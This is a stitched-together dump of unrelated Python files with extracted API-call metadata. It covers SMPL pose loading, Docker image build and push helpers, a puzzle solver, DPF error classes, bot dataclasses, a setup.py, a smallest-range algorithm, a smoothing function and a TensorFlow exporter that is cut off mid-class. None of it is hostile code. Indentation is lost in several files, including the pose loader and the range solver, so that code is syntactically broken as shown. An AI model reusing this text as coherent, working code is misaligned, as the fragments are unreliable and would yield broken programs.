pose_body_mats = vposer.decode(pose_body_vp[i]).reshape(-1, 3, 3).detach().cpu().numpy()
pose_body = np.zeros(63)
            for j in range(0, pose_body_mats.shape[0]):
                rot_vec, jac = cv2.Rodrigues(pose_body_mats[j])
                pose_body[3 * j: 3 * j + 3] = rot_vec.reshape(-1)
pose_body_list.append(pose_body)
pose_body = np.array(pose_body_list)
pose_jaw = poses[:, 32:35]
pose_eye = poses[:, 35:41]
pose_hand = poses[:, 41:-6]
else:
pose_body = poses[:, 0:63]
pose_jaw = poses[:, 63:66]
pose_eye = poses[:, 66:72]
pose_hand = poses[:, 72:-6]
if dev_orient is not None:
for i in range(n):
rot_mat = cv2.Rodrigues(rot[i].reshape(3, 1))[0]
dev_mat = cv2.Rodrigues(dev_orient.reshape(3, 1))[0]
rot_mat = dev_mat @ rot_mat
rot[i] = cv2.Rodrigues(rot_mat)[0].reshape(-1)
trans[i] = (dev_mat @ trans[i].reshape(3, 1) + dev_trans.reshape(3, 1)).reshape(-1)
result = {
'global_rvec': rot,
'global_tvec': trans,
'body_pose': pose_body,
'hand_pose': pose_hand,
'jaw_pose': pose_jaw,
'eye_pose': pose_eye,
'face_expression': face_expressions,
'betas': betas,
'n': n,
'frame_index2fit_index': frame_index2fit_index,
'is_male': is_male,
'is_vposer': is_vposer
}
return result
def load_avakhitov_fits(dp, load_betas=True, load_body_poses=True, load_expressions=False, load_fid_lst=True):
result = dict()
for flag, k, fn_no_ext in [
[load_betas, 'betas', 'betas'],
[load_body_poses, 'body_poses', 'poses'],
[load_expressions, 'expressions', 'expressions'],
[load_fid_lst, 'fid_lst', 'fid_lst']
]:
if flag:
load_fp = osp.join(dp, f'{fn_no_ext}.npy')
try:
loaded = np.load(load_fp)
except:
print(load_fp)
raise Exception()
if fn_no_ext == 'poses':
#load the vposer model
if loaded.shape[1] == 69:
pose_body = loaded[:, 0:32]
else:
vposer, _ = load_vposer(vposer_ckpt, vp_model='snapshot')
vposer.eval()
pose_body_vp = torch.tensor(loaded[:, 0:32])
#convert from vposer to rotation matrices
pose_body_mats = vposer.decode(pose_body_vp).reshape(len(loaded), -1, 3, 3).detach().cpu().numpy()
pose_body = np.zeros((pose_body_mats.shape[0], 63))
for i in range(0, pose_body_mats.shape[0]):
for j in range(0, pose_body_mats.shape[1]):
rot_vec, jac = cv2.Rodrigues(pose_body_mats[i,j])
pose_body[i, 3*j : 3*j+3] = rot_vec.reshape(-1)
result[k] = pose_body
result['global_rvecs'] = loaded[:, -3:]
result['global_tvecs'] = loaded[:, -6:-3]
result['n'] = len(loaded)
else:
result[k] = loaded
return result
def batch_rodrigues(rot_vecs, epsilon=1e-8, dtype=torch.float32):
''' Calculates the rotation matrices for a batch of rotation vectors
Parameters
----------
rot_vecs: torch.tensor Nx3
array of N axis-angle vectors
Returns
-------
R: torch.tensor Nx3x3
The rotation matrices for the given axis-angle parameters
'''
batch_size = rot_vecs.shape[0]
device = rot_vecs.device
angle = torch.norm(rot_vecs + 1e-8, dim=1, keepdim=True)
rot_dir = rot_vecs / angle
cos = torch.unsqueeze(torch.cos(angle), dim=1)
sin = torch.unsqueeze(torch.sin(angle), dim=1)
# Bx1 arrays
rx, ry, rz = torch.split(rot_dir, 1, dim=1)
K = torch.zeros((batch_size, 3, 3), dtype=dtype, device=device)
zeros = torch.zeros((batch_size, 1), dtype=dtype, device=device)
K = torch.cat([zeros, -rz, ry, rz, zeros, -rx, -ry, rx, zeros], dim=1) \
.view((batch_size, 3, 3))
ident = torch.eye(3, dtype=dtype, device=device).unsqueeze(dim=0)
rot_mat = ident + sin * K + (1 - cos) * torch.bmm(K, K)
return rot_mat
def get_selected_ids(id_sel_set, req_ids):
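    # for each id in req_ids, return its index in id_sel_set (or -1 if absent),
    # computed with a merge-style scan over the two sorted id arrays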
ss_sort = np.argsort(id_sel_set)
req_sort = np.argsort(req_ids)
id_ss_srt = id_sel_set[ss_sort]
id_ss_pos = np.arange(0, len(id_sel_set))[ss_sort]
req_srt = req_ids[req_sort]
req_srt_pos = -1 * np.ones(len(req_srt), dtype=int)
i = 0
j = 0
while i < len(id_ss_srt) and j < len(req_srt):
if req_srt[j] == id_ss_srt[i]:
req_srt_pos[j] = id_ss_pos[i]
i += 1
j += 1
elif req_srt[j] < id_ss_srt[i]:
j += 1
elif id_ss_srt[i] < req_srt[j]:
i += 1
req_ids_ans = -1 * np.ones(len(req_srt), dtype=int)
req_ids_ans[req_sort] = req_srt_pos
return req_ids_ans
| [
"torch.bmm",
"torch.split",
"human_body_prior.tools.model_loader.load_vposer",
"torch.eye",
"torch.sin",
"os.path.join",
"numpy.argsort",
"torch.tensor",
"torch.norm",
"numpy.array",
"torch.cos",
"numpy.zeros",
"cv2.Rodrigues",
"json.load",
"numpy.load",
"torch.zeros",
"torch.cat"
] | [((451, 484), 'numpy.load', 'np.load', (["(part_path + '/betas.npy')"], {}), "(part_path + '/betas.npy')\n", (458, 484), True, 'import numpy as np\n'), ((499, 534), 'numpy.load', 'np.load', (["(part_path + '/fid_lst.npy')"], {}), "(part_path + '/fid_lst.npy')\n", (506, 534), True, 'import numpy as np\n'), ((5335, 5384), 'torch.norm', 'torch.norm', (['(rot_vecs + 1e-08)'], {'dim': '(1)', 'keepdim': '(True)'}), '(rot_vecs + 1e-08, dim=1, keepdim=True)\n', (5345, 5384), False, 'import torch\n'), ((5553, 5583), 'torch.split', 'torch.split', (['rot_dir', '(1)'], {'dim': '(1)'}), '(rot_dir, 1, dim=1)\n', (5564, 5583), False, 'import torch\n'), ((5592, 5651), 'torch.zeros', 'torch.zeros', (['(batch_size, 3, 3)'], {'dtype': 'dtype', 'device': 'device'}), '((batch_size, 3, 3), dtype=dtype, device=device)\n', (5603, 5651), False, 'import torch\n'), ((5665, 5721), 'torch.zeros', 'torch.zeros', (['(batch_size, 1)'], {'dtype': 'dtype', 'device': 'device'}), '((batch_size, 1), dtype=dtype, device=device)\n', (5676, 5721), False, 'import torch\n'), ((6042, 6064), 'numpy.argsort', 'np.argsort', (['id_sel_set'], {}), '(id_sel_set)\n', (6052, 6064), True, 'import numpy as np\n'), ((6080, 6099), 'numpy.argsort', 'np.argsort', (['req_ids'], {}), '(req_ids)\n', (6090, 6099), True, 'import numpy as np\n'), ((326, 359), 'numpy.load', 'np.load', (["(part_path + '/poses.npy')"], {}), "(part_path + '/poses.npy')\n", (333, 359), True, 'import numpy as np\n'), ((605, 617), 'json.load', 'json.load', (['f'], {}), '(f)\n', (614, 617), False, 'import json\n'), ((1302, 1340), 'numpy.load', 'np.load', (["(part_path + '/dev_orient.npy')"], {}), "(part_path + '/dev_orient.npy')\n", (1309, 1340), True, 'import numpy as np\n'), ((1361, 1398), 'numpy.load', 'np.load', (["(part_path + '/dev_trans.npy')"], {}), "(part_path + '/dev_trans.npy')\n", (1368, 1398), True, 'import numpy as np\n'), ((1494, 1522), 'torch.tensor', 'torch.tensor', (['poses[:, 0:32]'], {}), '(poses[:, 0:32])\n', (1506, 1522), False, 'import torch\n'), ((2018, 2042), 'numpy.array', 'np.array', (['pose_body_list'], {}), '(pose_body_list)\n', (2026, 2042), True, 'import numpy as np\n'), ((5442, 5458), 'torch.cos', 'torch.cos', (['angle'], {}), '(angle)\n', (5451, 5458), False, 'import torch\n'), ((5493, 5509), 'torch.sin', 'torch.sin', (['angle'], {}), '(angle)\n', (5502, 5509), False, 'import torch\n'), ((388, 427), 'numpy.load', 'np.load', (["(part_path + '/expressions.npy')"], {}), "(part_path + '/expressions.npy')\n", (395, 427), True, 'import numpy as np\n'), ((1754, 1766), 'numpy.zeros', 'np.zeros', (['(63)'], {}), '(63)\n', (1762, 1766), True, 'import numpy as np\n'), ((3505, 3537), 'os.path.join', 'osp.join', (['dp', 'f"""{fn_no_ext}.npy"""'], {}), "(dp, f'{fn_no_ext}.npy')\n", (3513, 3537), True, 'import os.path as osp\n'), ((5730, 5796), 'torch.cat', 'torch.cat', (['[zeros, -rz, ry, rz, zeros, -rx, -ry, rx, zeros]'], {'dim': '(1)'}), '([zeros, -rz, ry, rz, zeros, -rx, -ry, rx, zeros], dim=1)\n', (5739, 5796), False, 'import torch\n'), ((5846, 5886), 'torch.eye', 'torch.eye', (['(3)'], {'dtype': 'dtype', 'device': 'device'}), '(3, dtype=dtype, device=device)\n', (5855, 5886), False, 'import torch\n'), ((5948, 5963), 'torch.bmm', 'torch.bmm', (['K', 'K'], {}), '(K, K)\n', (5957, 5963), False, 'import torch\n'), ((1854, 1886), 'cv2.Rodrigues', 'cv2.Rodrigues', (['pose_body_mats[i]'], {}), '(pose_body_mats[i])\n', (1867, 1886), False, 'import cv2\n'), ((3580, 3596), 'numpy.load', 'np.load', (['load_fp'], {}), '(load_fp)\n', (3587, 3596), True, 'import 
numpy as np\n'), ((3903, 3948), 'human_body_prior.tools.model_loader.load_vposer', 'load_vposer', (['vposer_ckpt'], {'vp_model': '"""snapshot"""'}), "(vposer_ckpt, vp_model='snapshot')\n", (3914, 3948), False, 'from human_body_prior.tools.model_loader import load_vposer\n'), ((4018, 4047), 'torch.tensor', 'torch.tensor', (['loaded[:, 0:32]'], {}), '(loaded[:, 0:32])\n', (4030, 4047), False, 'import torch\n'), ((4267, 4306), 'numpy.zeros', 'np.zeros', (['(pose_body_mats.shape[0], 63)'], {}), '((pose_body_mats.shape[0], 63))\n', (4275, 4306), True, 'import numpy as np\n'), ((2546, 2568), 'cv2.Rodrigues', 'cv2.Rodrigues', (['rot_mat'], {}), '(rot_mat)\n', (2559, 2568), False, 'import cv2\n'), ((4482, 4517), 'cv2.Rodrigues', 'cv2.Rodrigues', (['pose_body_mats[i, j]'], {}), '(pose_body_mats[i, j])\n', (4495, 4517), False, 'import cv2\n')] |
import docker
from dockerfile_generator import render
import os
import json
from tqdm import tqdm
from typing import Union, Any, Optional
def build_image(repo_url: str, tag: str, path: str) -> None:
"""
build_image builds the image with the given tag
"""
client = docker.from_env()
print(f"Building image: {tag}")
client.images.build(tag=tag, path=path)
print("Successfully built image!")
def push_image(tag: str) -> None:
"""
push_image pushes the given tag. It uses
the current docker environment
"""
client = docker.from_env()
print(f"Pushing image: {tag}")
with tqdm(total=100, ascii=False) as progress_bar:
last_percent = 0.0
for line in client.images.push(tag, stream=True):
percent = get_completion_percentage(line)
if percent:
progress_bar.update(percent - last_percent)
last_percent = percent
def retag_image(
old_repo_url: str,
new_repo_url: str,
old_tag: str,
new_tag: str,
path: str,
labels: Optional[dict] = None,
username: Optional[str] = None,
password: Optional[str] = None,
registry: Optional[str] = None,
) -> None:
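    # build a trivial image deriving FROM the old repo:tag, re-tag it for the new repo,
    # and push it only if new_repo_url:new_tag does not already exist in the registry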
with open(f"{path}/Dockerfile", "w") as f:
f.write(f"FROM {old_repo_url}:{old_tag}")
client = docker.from_env()
if all(value is not None for value in [username, password, registry]):
client.login(username=username, password=password, registry=registry)
image, _ = client.images.build(path=f"{path}", labels=labels, tag=new_tag)
image.tag(new_repo_url, new_tag)
os.remove(f"{path}/Dockerfile")
# We do not want to republish an image that has not changed, so we check if the new
# pair repo:tag already exists.
try:
image = client.images.pull(new_repo_url, new_tag)
return
# We also need to catch APIError as if the image has been recently deleted (uncommon, but might happen?)
# we will get this kind of error:
# docker.errors.APIError: 500 Server Error: Internal Server Error
# ("unknown: Tag <tag> was deleted or has expired. To pull, revive via time machine"
except (docker.errors.ImageNotFound, docker.errors.APIError) as e:
pass
print(f"Pushing to {new_repo_url}:{new_tag}")
client.images.push(new_repo_url, new_tag)
def get_completion_percentage(line: Any) -> float:
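    # parse one JSON progress line from the docker push stream and return the completion
    # percentage for "Pushing" status lines (other statuses report 0)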
try:
line = json.loads(line.strip().decode("utf-8"))
except ValueError:
return 0
to_skip = ("Preparing", "Waiting", "Layer already exists")
if "status" in line:
if line["status"] in to_skip:
return 0
if line["status"] == "Pushing":
try:
current = float(line["progressDetail"]["current"])
total = float(line["progressDetail"]["total"])
except KeyError:
return 0
result = (current / total) * 100
if result > 100.0:
return 100.0
return result
return 0
def build_and_push_image(repo_url: str, tag: str, path: str, image_type: str) -> None:
"""
    build_and_push_image creates the Dockerfile for the requested image type
and pushes it to the target repo
"""
dockerfile_text = render(image_type, ["."])
with open(f"{path}/Dockerfile", "w") as f:
f.write(dockerfile_text)
build_image(repo_url, tag, path)
os.remove(f"{path}/Dockerfile")
push_image(tag)
| [
"dockerfile_generator.render",
"docker.from_env",
"tqdm.tqdm",
"os.remove"
] | [((283, 300), 'docker.from_env', 'docker.from_env', ([], {}), '()\n', (298, 300), False, 'import docker\n'), ((565, 582), 'docker.from_env', 'docker.from_env', ([], {}), '()\n', (580, 582), False, 'import docker\n'), ((1315, 1332), 'docker.from_env', 'docker.from_env', ([], {}), '()\n', (1330, 1332), False, 'import docker\n'), ((1607, 1638), 'os.remove', 'os.remove', (['f"""{path}/Dockerfile"""'], {}), "(f'{path}/Dockerfile')\n", (1616, 1638), False, 'import os\n'), ((3255, 3280), 'dockerfile_generator.render', 'render', (['image_type', "['.']"], {}), "(image_type, ['.'])\n", (3261, 3280), False, 'from dockerfile_generator import render\n'), ((3403, 3434), 'os.remove', 'os.remove', (['f"""{path}/Dockerfile"""'], {}), "(f'{path}/Dockerfile')\n", (3412, 3434), False, 'import os\n'), ((627, 655), 'tqdm.tqdm', 'tqdm', ([], {'total': '(100)', 'ascii': '(False)'}), '(total=100, ascii=False)\n', (631, 655), False, 'from tqdm import tqdm\n')] |
import io
grid = {}
y = 0
x = 0
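# read the starting grid: '.' marks a clean node, '#' an infected node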
for l in io.open("day22.in").read().splitlines():
for x in range(len(l)):
grid[(y,x)] = l[x]
y += 1
y = y // 2
x = x // 2
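# the virus carrier starts at the centre of the grid, facing up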
dx = 0
dy = -1
r = 0
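# run 10,000,000 bursts; nodes cycle '.' -> weakened 'W' -> infected '#' -> flagged 'F' -> '.',
# and r counts the bursts that infect a node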
for _ in range(10000000):
if (y,x) not in grid or grid[(y,x)] == '.':
(dy, dx) = (-dx, dy)
grid[(y,x)] = 'W'
elif grid[(y,x)] == 'W':
grid[(y,x)] = '#'
r += 1
elif grid[(y,x)] == '#':
(dy, dx) = (dx, -dy)
grid[(y,x)] = 'F'
elif grid[(y,x)] == 'F':
(dy, dx) = (-dy, -dx)
grid[(y,x)] = '.'
y += dy
x += dx
print(r) | [
"io.open"
] | [((42, 61), 'io.open', 'io.open', (['"""day22.in"""'], {}), "('day22.in')\n", (49, 61), False, 'import io\n')] |
from grpc._channel import _InactiveRpcError, _MultiThreadedRendezvous
from functools import wraps
_COMPLEX_PLOTTING_ERROR_MSG = """
Complex fields cannot be plotted. Use operators to get the amplitude
or the result at a defined sweeping phase before plotting.
"""
_FIELD_CONTAINER_PLOTTING_MSG = """"
This fields_container contains multiple fields. Only one time-step
result can be plotted at a time. Extract a field with
``fields_container[index]``.
"""
class DpfVersionNotSupported(RuntimeError):
"""Error raised when the dpf-core/grpc-dpf python features are not
supported by the DPF gRPC server version."""
def __init__(self, version, msg=None):
if msg is None:
msg = "Feature not supported. Upgrade the server to "
msg += str(version)
msg += " version (or above)."
RuntimeError.__init__(self, msg)
class DpfValueError(ValueError):
"""Error raised when a specific DPF error value must be defined."""
def __init__(
self, msg="A value that has been set leads to incorrect DPF behavior."
):
ValueError.__init__(self, msg)
class InvalidTypeError(ValueError):
"""Error raised when a parameter has the wrong type."""
def __init__(self, data_type, parameter_name):
msg = (
"A "
+ data_type
+ " must be used for the following parameter: "
+ parameter_name
+ "."
)
ValueError.__init__(self, msg)
class LocationError(ValueError):
"""Error raised when using an invalid location."""
def __init__(self, msg="Invalid location"):
ValueError.__init__(self, msg)
class ComplexPlottingError(ValueError):
"""Error raised when attempting to plot a field with complex data."""
def __init__(self, msg=_COMPLEX_PLOTTING_ERROR_MSG):
ValueError.__init__(self, msg)
class FieldContainerPlottingError(ValueError):
"""Error raised when attempting to plot a fields_container containing
multiple fields."""
def __init__(self, msg=_FIELD_CONTAINER_PLOTTING_MSG):
ValueError.__init__(self, msg)
class InvalidANSYSVersionError(RuntimeError):
"""Error raised when the Ansys verion is invalid."""
def __init__(self, msg=""):
RuntimeError.__init__(self, msg)
class DPFServerException(Exception):
"""Error raised when the DPF server has encountered an error."""
def __init__(self, msg=""):
Exception.__init__(self, msg)
class DPFServerNullObject(Exception):
"""Error raised when the DPF server cannot find an object."""
def __init__(self, msg=""):
Exception.__init__(self, msg)
class InvalidPortError(OSError):
"""Error raised when used an invalid port when starting DPF."""
def __init__(self, msg=""):
OSError.__init__(self, msg)
def protect_grpc(func):
"""Capture gRPC exceptions and return a more succinct error message."""
@wraps(func)
def wrapper(*args, **kwargs):
"""Capture gRPC exceptions."""
# Capture gRPC exceptions
try:
out = func(*args, **kwargs)
except (_InactiveRpcError, _MultiThreadedRendezvous) as error:
details = error.details()
if "object is null in the dataBase" in details:
raise DPFServerNullObject(details) from None
raise DPFServerException(details) from None
return out
return wrapper
| [
"functools.wraps"
] | [((2939, 2950), 'functools.wraps', 'wraps', (['func'], {}), '(func)\n', (2944, 2950), False, 'from functools import wraps\n')] |
from dataclasses import dataclass
from dataclasses import field
from time import time
from typing import Any
from typing import Callable
from typing import Dict
from typing import List
from typing import Optional
from typing import Tuple
@dataclass
class NewUser:
"""Deals with the commands the user is currently sending"""
user_id: int
chat_id: int
command: str
def __repr__(self) -> str:
return f"{self.user_id=} {self.command=}"
@dataclass
class UserCommand:
"""Stores the latest command sent by the user"""
user_id: int
command: str
insert_time: int = int(time()) # for garbage collection
def __repr__(self) -> str:
return f"{self.user_id=} {self.command=} {self.insert_time=}"
@dataclass
class MessageInfo:
"""Important things in the message"""
user_id: int
chat_id: int
message_id: int
text: str
def __repr__(self) -> str:
return f"{self.user_id=} {self.chat_id=} {self.message_id=} {self.text=}"
@dataclass
class UserDBInfo:
"""Info about the user from the DB"""
feed: bool # if false, the bot will not send any news feeds on a daily basis
user_id: int
db_id: int
topics: List[str] = field(default_factory=lambda: [])
def __repr__(self) -> str:
return f"{self.user_id=} {self.feed=} {self.db_id=} {self.topics=}"
@dataclass
class StagedFunction:
"""For FunctionStagingArea"""
fn: Callable[..., Any]
args: Optional[Tuple[Any, ...]] = None
kwargs: Optional[Dict[str, Any]] = None
| [
"time.time",
"dataclasses.field"
] | [((1216, 1250), 'dataclasses.field', 'field', ([], {'default_factory': '(lambda : [])'}), '(default_factory=lambda : [])\n', (1221, 1250), False, 'from dataclasses import field\n'), ((612, 618), 'time.time', 'time', ([], {}), '()\n', (616, 618), False, 'from time import time\n')] |
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from setuptools import setup
with open("README.md") as f:
readme = f.read()
setup(
name="dpr",
version="0.1.0",
description="Facebook AI Research Open Domain Q&A Toolkit",
url="https://github.com/facebookresearch/DPR/",
classifiers=[
"Intended Audience :: Science/Research",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3.6",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
],
long_description=readme,
long_description_content_type="text/markdown",
setup_requires=[
"setuptools>=18.0",
],
install_requires=[
"cython",
"faiss-cpu>=1.6.1",
"filelock",
"numpy",
"regex",
"torch>=1.2.0",
"transformers>=3.0.0,<3.1.0",
"tqdm>=4.27",
"wget",
"spacy>=2.1.8",
],
)
| [
"setuptools.setup"
] | [((284, 941), 'setuptools.setup', 'setup', ([], {'name': '"""dpr"""', 'version': '"""0.1.0"""', 'description': '"""Facebook AI Research Open Domain Q&A Toolkit"""', 'url': '"""https://github.com/facebookresearch/DPR/"""', 'classifiers': "['Intended Audience :: Science/Research',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 3.6',\n 'Topic :: Scientific/Engineering :: Artificial Intelligence']", 'long_description': 'readme', 'long_description_content_type': '"""text/markdown"""', 'setup_requires': "['setuptools>=18.0']", 'install_requires': "['cython', 'faiss-cpu>=1.6.1', 'filelock', 'numpy', 'regex', 'torch>=1.2.0',\n 'transformers>=3.0.0,<3.1.0', 'tqdm>=4.27', 'wget', 'spacy>=2.1.8']"}), "(name='dpr', version='0.1.0', description=\n 'Facebook AI Research Open Domain Q&A Toolkit', url=\n 'https://github.com/facebookresearch/DPR/', classifiers=[\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 3.6',\n 'Topic :: Scientific/Engineering :: Artificial Intelligence'],\n long_description=readme, long_description_content_type='text/markdown',\n setup_requires=['setuptools>=18.0'], install_requires=['cython',\n 'faiss-cpu>=1.6.1', 'filelock', 'numpy', 'regex', 'torch>=1.2.0',\n 'transformers>=3.0.0,<3.1.0', 'tqdm>=4.27', 'wget', 'spacy>=2.1.8'])\n", (289, 941), False, 'from setuptools import setup\n')] |
# encoding: utf-8
"""
@version: v1.0
@author: Richard
@license: Apache Licence
@contact: <EMAIL>
@site:
@software: PyCharm
@time: 2019/9/12 20:37
"""
from pprint import pprint as pp
from operator import itemgetter
import time
from collections import OrderedDict
from hard.smallest_range.srcs.big_2d_list import BIG_LIST_85
from hard.smallest_range.srcs.big_2d_list import BIG_LIST_86
class Solution:
"""
    Input: [[4,10,15,24,26], [0,9,12,20], [5,18,22,30]]
    Output: [20,24]
"""
def smallestRange(self, nums):
start_time = time.time()
k = len(nums)
print('k-->', k)
k_tagged_merged_list = []
for i in range(k):
row = nums[i]
k_tagged_merged_list.extend([(e, i) for e in row])
k_tagged_merged_list.sort(key=itemgetter(0))
sort_end_time = time.time()
print('sorting time:', sort_end_time - start_time)
# print(k_tagged_merged_list)
od = OrderedDict()
min_range = None
min_range_len = int(2e5)
# print('min_range_len', min_range_len)
tot_len = len(k_tagged_merged_list)
# print('tot_len', tot_len)
i = 0
while i < tot_len:
this_tag = k_tagged_merged_list[i][1]
cur_tag_set = od.keys()
if this_tag in cur_tag_set:
od.pop(this_tag)
od[this_tag] = k_tagged_merged_list[i][0]
tags = od.keys()
# print('len_k_dque-->', len(k_dque))
# print('len_k_dque_tags-->', len(k_dque_tags))
if len(tags) == k:
keys = list(od.keys())
first_v = od[keys[0]]
last_v = od[keys[-1]]
k_range_len = last_v - first_v
if k_range_len < min_range_len:
min_range_len = k_range_len
min_range = first_v, last_v
i += 1
print('ending main time:', time.time() - sort_end_time)
return min_range
if __name__ == '__main__':
s = Solution()
nums = [[4, 10, 15, 24, 26], [0, 9, 12, 20], [5, 18, 22, 30]]
# nums = [[10], [11]]
# nums = [[11,38,83,
# 84,84,85,88,89,89,92],[28,61,89],[52,77,79,80,81],[21,25,26,26,26,27],[9,83,85,90],[84,85,87],[26,68,70,71],[36,40,41,42,45],[-34,21],[-28,-28,-23,1,13,21,28,37,37,38],[-74,1,2,22,33,35,43,45],[54,96,98,98,99],[43,54,60,65,71,75],[43,46],[50,50,58,67,69],[7,14,15],[78,80,89,89,90],[35,47,63,69,77,92,94]]
# [-74, 1, 2, 22, 33, 35, 43, 45], [54, 96, 98, 98, 99], [43, 54, 60, 65, 71, 75], [43, 46],
# [50, 50, 58, 67, 69], [7, 14, 15], [78, 80, 89, 89, 90], [35, 47, 63, 69, 77, 92, 94]]
nums = BIG_LIST_85
# nums = BIG_LIST_86
min_range = s.smallestRange(nums)
print(min_range)
| [
"operator.itemgetter",
"collections.OrderedDict",
"time.time"
] | [((555, 566), 'time.time', 'time.time', ([], {}), '()\n', (564, 566), False, 'import time\n'), ((842, 853), 'time.time', 'time.time', ([], {}), '()\n', (851, 853), False, 'import time\n'), ((965, 978), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (976, 978), False, 'from collections import OrderedDict\n'), ((803, 816), 'operator.itemgetter', 'itemgetter', (['(0)'], {}), '(0)\n', (813, 816), False, 'from operator import itemgetter\n'), ((1956, 1967), 'time.time', 'time.time', ([], {}), '()\n', (1965, 1967), False, 'import time\n')] |
import numpy as np
def smooth(a, WSZ):
# a: NumPy 1-D array containing the data to be smoothed
    # WSZ: smoothing window size; it must be an odd number,
# as in the original MATLAB implementation
if WSZ % 2 == 0:
WSZ = WSZ - 1
out0 = np.convolve(a, np.ones(WSZ, dtype=int), 'valid') / WSZ
r = np.arange(1, WSZ - 1, 2)
start = np.cumsum(a[:WSZ - 1])[::2] / r
stop = (np.cumsum(a[:-WSZ:-1])[::2] / r)[::-1]
return np.concatenate((start, out0, stop))
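# Minimal usage sketch (illustrative, not part of the original snippet; the
# signal and window size below are made-up values):
if __name__ == "__main__":
    x = np.linspace(0, 2 * np.pi, 101)
    noisy = np.sin(x) + 0.1 * np.random.randn(x.size)
    smoothed = smooth(noisy, 11)  # WSZ must be odd; even values are reduced by one
    print(smoothed.shape)  # same length as the input array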
| [
"numpy.concatenate",
"numpy.cumsum",
"numpy.ones",
"numpy.arange"
] | [((331, 355), 'numpy.arange', 'np.arange', (['(1)', '(WSZ - 1)', '(2)'], {}), '(1, WSZ - 1, 2)\n', (340, 355), True, 'import numpy as np\n'), ((462, 497), 'numpy.concatenate', 'np.concatenate', (['(start, out0, stop)'], {}), '((start, out0, stop))\n', (476, 497), True, 'import numpy as np\n'), ((283, 306), 'numpy.ones', 'np.ones', (['WSZ'], {'dtype': 'int'}), '(WSZ, dtype=int)\n', (290, 306), True, 'import numpy as np\n'), ((368, 390), 'numpy.cumsum', 'np.cumsum', (['a[:WSZ - 1]'], {}), '(a[:WSZ - 1])\n', (377, 390), True, 'import numpy as np\n'), ((412, 434), 'numpy.cumsum', 'np.cumsum', (['a[:-WSZ:-1]'], {}), '(a[:-WSZ:-1])\n', (421, 434), True, 'import numpy as np\n')] |
from __future__ import absolute_import
import abc
import os
import json
import glob
import shutil
from tensorflow.python.estimator import gc
from tensorflow.python.estimator import util
from tensorflow.python.estimator.canned import metric_keys
from tensorflow.python.framework import errors_impl
from tensorflow.python.platform import gfile
from tensorflow.python.platform import tf_logging
from tensorflow.python.summary import summary_iterator
from tensorflow.python.estimator.exporter import Exporter, _SavedModelExporter
def _verify_compare_fn_args(compare_fn):
"""Verifies compare_fn arguments."""
args = set(util.fn_args(compare_fn))
if 'best_eval_result' not in args:
raise ValueError(
'compare_fn (%s) must include best_eval_result argument.' % compare_fn)
if 'current_eval_result' not in args:
raise ValueError(
'compare_fn (%s) must include current_eval_result argument.' %
compare_fn)
non_valid_args = list(args - set(['best_eval_result', 'current_eval_result']))
if non_valid_args:
raise ValueError('compare_fn (%s) has following not expected args: %s' %
(compare_fn, non_valid_args))
def _loss_smaller(best_eval_result, current_eval_result):
"""Compares two evaluation results and returns true if the 2nd one is smaller.
Both evaluation results should have the values for MetricKeys.LOSS, which are
used for comparison.
Args:
best_eval_result: best eval metrics.
current_eval_result: current eval metrics.
Returns:
True if the loss of current_eval_result is smaller; otherwise, False.
Raises:
ValueError: If input eval result is None or no loss is available.
"""
default_key = metric_keys.MetricKeys.LOSS
if not best_eval_result or default_key not in best_eval_result:
raise ValueError(
'best_eval_result cannot be empty or no loss is found in it.')
if not current_eval_result or default_key not in current_eval_result:
raise ValueError(
'current_eval_result cannot be empty or no loss is found in it.')
return best_eval_result[default_key] > current_eval_result[default_key]
class BestExporter(Exporter):
"""This class exports the serving graph and checkpoints of the best models.
  This class performs a model export every time the new model is better
  than any existing model.
"""
def __init__(self,
name='best_exporter',
serving_input_receiver_fn=None,
event_file_pattern='eval/*.tfevents.*',
compare_fn=_loss_smaller,
assets_extra=None,
as_text=False,
exports_to_keep=5):
"""Create an `Exporter` to use with `tf.estimator.EvalSpec`.
    Example of creating a BestExporter for training and evaluation:
```python
def make_train_and_eval_fn():
# Set up feature columns.
categorial_feature_a = (
tf.feature_column.categorical_column_with_hash_bucket(...))
categorial_feature_a_emb = embedding_column(
categorical_column=categorial_feature_a, ...)
... # other feature columns
estimator = tf.estimator.DNNClassifier(
config=tf.estimator.RunConfig(
model_dir='/my_model', save_summary_steps=100),
feature_columns=[categorial_feature_a_emb, ...],
hidden_units=[1024, 512, 256])
serving_feature_spec = tf.feature_column.make_parse_example_spec(
categorial_feature_a_emb)
serving_input_receiver_fn = (
tf.estimator.export.build_parsing_serving_input_receiver_fn(
serving_feature_spec))
exporter = tf.estimator.BestExporter(
name="best_exporter",
serving_input_receiver_fn=serving_input_receiver_fn,
exports_to_keep=5)
train_spec = tf.estimator.TrainSpec(...)
eval_spec = [tf.estimator.EvalSpec(
input_fn=eval_input_fn,
steps=100,
exporters=exporter,
start_delay_secs=0,
throttle_secs=5)]
return tf.estimator.DistributedTrainingSpec(estimator, train_spec,
eval_spec)
```
Args:
name: unique name of this `Exporter` that is going to be used in the
export path.
serving_input_receiver_fn: a function that takes no arguments and returns
a `ServingInputReceiver`.
event_file_pattern: event file name pattern relative to model_dir. If
        None, however, the exporter would not be preemption-safe. To be
preemption-safe, event_file_pattern should be specified.
compare_fn: a function that compares two evaluation results and returns
true if current evaluation result is better. Follows the signature:
* Args:
* `best_eval_result`: This is the evaluation result of the best model.
* `current_eval_result`: This is the evaluation result of current
candidate model.
* Returns:
True if current evaluation result is better; otherwise, False.
assets_extra: An optional dict specifying how to populate the assets.extra
directory within the exported SavedModel. Each key should give the
destination path (including the filename) relative to the assets.extra
directory. The corresponding value gives the full path of the source
file to be copied. For example, the simple case of copying a single
file without renaming it is specified as `{'my_asset_file.txt':
'/path/to/my_asset_file.txt'}`.
as_text: whether to write the SavedModel proto in text format. Defaults to
`False`.
exports_to_keep: Number of exports to keep. Older exports will be
garbage-collected. Defaults to 5. Set to `None` to disable garbage
collection.
Raises:
ValueError: if any arguments is invalid.
"""
self._compare_fn = compare_fn
if self._compare_fn is None:
raise ValueError('`compare_fn` must not be None.')
_verify_compare_fn_args(self._compare_fn)
self._saved_model_exporter = _SavedModelExporter(
name, serving_input_receiver_fn, assets_extra, as_text)
self._event_file_pattern = event_file_pattern
